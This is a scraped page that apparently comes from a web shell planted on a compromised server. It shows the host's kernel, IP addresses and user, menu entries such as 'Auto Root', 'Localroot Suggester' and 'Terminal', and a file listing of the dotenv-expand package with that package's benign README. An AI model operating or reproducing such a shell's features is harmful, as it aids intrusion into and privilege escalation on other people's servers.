Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.28.86
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
dotenv-expand /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.npmignore
68
B
-rw-r--r--
2017-03-31 03:19
CONTRIBUTING.md
697
B
-rw-r--r--
2017-03-31 03:19
LICENSE
1.26
KB
-rw-r--r--
2017-03-31 03:19
README.md
1.43
KB
-rw-r--r--
2017-11-20 15:58
dotenv-expand.png
10.99
KB
-rw-r--r--
2017-03-31 03:19
index.d.ts
261
B
-rw-r--r--
2018-02-08 05:00
package.json
1.23
KB
-rw-r--r--
2021-02-04 21:24
Save
Rename
[](http://www.opensourcecitizen.org/project?url=github.com/motdotla/dotenv-expand) If you found this library useful, donate some CPU cycles to this project by clicking above. Thank you! 😇 # dotenv-expand <img src="https://raw.githubusercontent.com/motdotla/dotenv-expand/master/dotenv-expand.png" alt="dotenv-expand" align="right" /> Dotenv-expand adds variable expansion on top of [dotenv](http://github.com/motdotla/dotenv). If you find yourself needing to expand environment variables already existing on your machine, then dotenv-expand is your tool. [](https://travis-ci.org/motdotla/dotenv-expand) [](https://www.npmjs.com/package/dotenv-expand) [](https://github.com/feross/standard) ## Install ```bash npm install dotenv --save npm install dotenv-expand --save ``` ## Usage As early as possible in your application, require dotenv and dotenv-expand, and wrap dotenv-expand around dotenv. ```js var dotenv = require('dotenv') var dotenvExpand = require('dotenv-expand') var myEnv = dotenv.config() dotenvExpand(myEnv) ``` See [test/.env](./test/.env) for examples of variable expansion in your `.env` file.